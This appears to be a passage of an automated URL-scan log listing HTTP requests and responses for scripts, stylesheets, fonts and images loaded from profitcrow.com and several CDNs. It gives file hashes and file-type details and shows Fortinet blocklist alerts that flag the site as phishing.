Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 03 Aug 2022 05:15:30 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 3688
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (6497)
Size:   3688
Md5:    8d388f2c3006f4570ee4c6499d29570d
Sha1:   9bab3f56143a3f3d4da298c4e1f2d7daf9be8b34
Sha256: ff623286211f4f108e8ddd9c9676b67cdaad2b18e4664afb954392ee86e3364c

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/stripe-payments/public/assets/js/stripe-handler-ng.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Mon, 21 Mar 2022 05:32:36 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 3626
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (365)
Size:   3626
Md5:    2cdc04d78f7ee7a7a45bfa0f71748bba
Sha1:   c02d3f7108cea894457bc649fb8140d1823c4e14
Sha256: ddfe23792f318770019fdf20f4121f4c85796ffd938ff72dceb06d27bc42ec6a

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/twentytwentyone/assets/js/primary-navigation.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Fri, 02 Jul 2021 19:08:57 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 3027
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   3027
Md5:    e4a16c411111952ff1102ed8259d2050
Sha1:   f8857129dd5052a2b00ef5faa638fa89ad7ca6be
Sha256: 1e37c3bd3728db033adb56e0dbfb9ba5a0bc5588f0378f50065ddd373f8984a9

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-includes/js/mediaelement/renderers/vimeo.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 30 Sep 2020 01:23:06 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 3373
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (6216)
Size:   3373
Md5:    3992e282ab32666818c2d0e616dc1b77
Sha1:   515f5c4dd13f8ef3a887fdcf16b3303ef44c8683
Sha256: ed272ac58e0c1443d08e7b44296b36e9d4063414e38f7ce0afb703cfb194aebc

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-includes/js/jquery/ui/core.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 03 Aug 2022 05:15:31 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 7961
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (8211)
Size:   7961
Md5:    5dd1bc1f3ea8e5e4a837ea607e2b77e3
Sha1:   74211160587dca82bd900ada3516b6c8f0e4efde
Sha256: ed11ec8e4fdd0616ed2b2483fcbff6164ee99c54e310db5cdc4305bbac46832f

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ffad04f54-f199-4bc1-a785-cf5c76640147.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 11150
x-amzn-requestid: 0b773c28-feda-41a2-9de6-8b559bd773eb
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cLVC5EukoAMFxfA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63813545-3bfe118939abc352072c5af1;Sampled=0
x-amzn-remapped-date: Fri, 25 Nov 2022 21:36:05 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: TpEr70sCNigNhVg7rDFIUG12AVpzC0BUW6-xW3QTvjLcBUrpehjJbQ==
via: 1.1 0005a84c2971ff4f5bbb79e7ebc622a8.cloudfront.net (CloudFront), 1.1 112d82578d402a38d8d02e8b857617e0.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 21:46:06 GMT
age: 1318
etag: "845842c789e6e97fd1687e668d446bbb8309ffc7"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   11150
Md5:    d0f860248042a8499ffb1701a880b2ba
Sha1:   845842c789e6e97fd1687e668d446bbb8309ffc7
Sha256: 9eca5258c7b6e4e145ca6576a3f3791f1324714404ffd7a56a61961f81e7bd44
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fcc7a5b86-3ad1-40c7-b173-8a9ac078c227.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8913
x-amzn-requestid: d0a9414c-eccf-44e8-adb7-92654544eeb5
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cLWWXEpeIAMFnzw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6381375b-5825510666b3e80a5f83cafa;Sampled=0
x-amzn-remapped-date: Fri, 25 Nov 2022 21:44:59 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: whO__FB0B2ywDP_p63eQ044RXbT207sX1i87I6nPAFUB85nSYc0Cuw==
via: 1.1 00f0a41f749793b9dd653153037c957e.cloudfront.net (CloudFront), 1.1 57a21088b36c69a83578b5a5579df58e.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 21:46:06 GMT
age: 1318
etag: "0b6c9b51d10762a4747286ab5b1c2354fa39c622"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8913
Md5:    5088223f5973e3cd56f03f50a1e84b79
Sha1:   0b6c9b51d10762a4747286ab5b1c2354fa39c622
Sha256: 8159e4f7eec7bea518bb29e3fdb070bab4fb70116205577f7b7d74ad4d0dfbc7
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F18e649ab-6d56-47c9-ab7e-c65d9bdfcffd.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6789
x-amzn-requestid: eede6332-5376-4f9c-83fc-f894430c1f4b
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cLWWYFFgoAMFhaQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6381375b-66d7ffc70f7d901420a503da;Sampled=0
x-amzn-remapped-date: Fri, 25 Nov 2022 21:44:59 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: yM8EHyxy6pUHVZhGUOHuFOU-Z4eTyL2N3Ooa6QMrPlIfp6X5I_JBRw==
via: 1.1 41e349e25dc4bc856d0e5d2c162428a0.cloudfront.net (CloudFront), 1.1 32c16f33c8f5601364fa8229b0d74dc2.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 21:46:06 GMT
age: 1318
etag: "c47a3884465fc02b5c57faa5ffbd986ba29c64c2"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6789
Md5:    926df9839ec3d924b563b55d8bccace8
Sha1:   c47a3884465fc02b5c57faa5ffbd986ba29c64c2
Sha256: a97cd625959aa81bc516024628315b2c6e2ce94f76cd579751a686a6611cc4d2
                                        
                                            GET /wp-content/plugins/elementor/assets/js/frontend.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 11756
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (36864)
Size:   11756
Md5:    4df8270b9bef8842f86ee55d1056915d
Sha1:   e20ebeac9b5bb923a60c8450b2d050830a736312
Sha256: 19954f6aef0c2ea22736d4f24daa47c21a696b1589191b18abe8638d950578e4

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/elementor/assets/js/frontend-modules.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 5772
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (14218)
Size:   5772
Md5:    1f43b2d49313bf72e06ee4c7d3293363
Sha1:   92b34fe1d79f01addcd66101fd4483e47bbd4ac4
Sha256: 2e6a02fd2942f482850fbb250e911d678678dc000a57bccffdfb6907bb2ab2eb

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/header-footer-elementor/inc/js/frontend.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:09:26 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 4699
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   4699
Md5:    6e4cb2fa645238bdc0f574672f15a1fa
Sha1:   912a37467b48a43be834cb792383ca762d9c1821
Sha256: 6195b94cd8bcb7324ca47180bcbd1aa7093c8e76756822ecf038a3d04fe16ca6

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 4191
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (12220)
Size:   4191
Md5:    6fe5bb96a023659232ce4325f44d33f7
Sha1:   7ec823f8282b61aabfb554822fd1b6c2da4391e0
Sha256: 5d3ce78e4a36a2b30806af6904d874109265da5ae16761f5683e1eb74fb4ab5b

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/elementor/assets/js/webpack.runtime.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 3313
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (4888)
Size:   3313
Md5:    9c082a8068c41865ef59f1304596126e
Sha1:   6882584706cbfd89a38156a15de51355b467a06f
Sha256: a89a9a40a380cdf15ec7285508d9b188648b3d0b4fcf2027e643b4668e135a08

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/uploads/hummingbird-assets/e49d536499e990405f601b33fd712665.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
x-powered-by: PHP/7.2.34
cache-control: max-age=3600, must-revalidate
hummingbird-cache: Served
content-length: 1140
content-encoding: br
vary: Accept-Encoding
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text
Size:   1140
Md5:    b8b9e50df0ad408c6ba99ad19a04bec3
Sha1:   2fcf28e9519f5609e4f21a68a185bb3fa10e5bc3
Sha256: 7803fd5ce1d93c86bbcef77bc28276951844c42acf6705226db9085843489467
                                        
                                            GET /wp-content/uploads/pum/pum-site-scripts.js?defer&generated=1641964841&ver=1.16.2 HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 12 Jan 2022 05:20:41 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 17941
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (65398)
Size:   17941
Md5:    83c7e8fc21afce24b9b7f13427a94e19
Sha1:   db68ab99deca6b19d33c3f03750e84245a1b4641
Sha256: 7505fda2d6c2b4d8d3a5ce366bd1d08342a66c668b527cb1c67a03461807efe6
                                        
                                            GET /wp-includes/js/mediaelement/mediaelement-and-player.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 30 Sep 2020 01:23:06 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 37603
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65266)
Size:   37603
Md5:    20b247de3bf92a6db16a55d35e84c219
Sha1:   98bfdc1c13085c6d32101e441fdebf71970328d0
Sha256: 14f496c4ead6b1346a50a96bb7f019a3f444c2a5ead00b63c8457c0922fba07b

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/uploads/hummingbird-assets/8dac274b8cd5a47d46ebbe881c0604bb.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
x-powered-by: PHP/7.2.34
cache-control: max-age=3600, must-revalidate
hummingbird-cache: Served
content-length: 1139
content-encoding: br
vary: Accept-Encoding
date: Fri, 25 Nov 2022 22:08:05 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text
Size:   1139
Md5:    af2fb701e56c0a8f6e8d8b9102ea5392
Sha1:   0a649bd36c780499ca515ced85f753985de6b125
Sha256: 71d68c40acd613e9ff3f8cfe1d233c07c35e4623c49ed0ddc54059806c24c660
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 25 Nov 2022 22:08:05 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /s/lora/v26/0QIvMX1D_JOuMwr7Iw.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://profitcrow.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         216.58.207.195
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 35660
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 23 Nov 2022 08:03:57 GMT
expires: Thu, 23 Nov 2023 08:03:57 GMT
cache-control: public, max-age=31536000
age: 223448
last-modified: Mon, 15 Aug 2022 18:07:59 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 35660, version 1.0\012- data
Size:   35660
Md5:    0d0d3e5824e5e67a9e993960df2b67a9
Sha1:   328d67bb1d5899a7809df9f4385181863fd035f1
Sha256: 38da98e06ba18c4204f547d30572cd81a2dd3fd5438d306856d2617480ee8639
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 25 Nov 2022 22:08:05 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /ajax/libs/font-awesome/6.0.0/webfonts/fa-solid-900.woff2 HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://profitcrow.com
Connection: keep-alive
Referer: https://cdnjs.cloudflare.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         104.17.25.14
HTTP/2 200 OK
content-type: application/octet-stream; charset=utf-8
                                        
date: Fri, 25 Nov 2022 22:08:05 GMT
content-length: 126828
access-control-allow-origin: *
cache-control: public, max-age=30672000
etag: "620188b3-1ef6c"
last-modified: Mon, 07 Feb 2022 21:01:39 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
vary: Accept-Encoding
cf-cache-status: HIT
age: 7145923
expires: Wed, 15 Nov 2023 22:08:05 GMT
accept-ranges: bytes
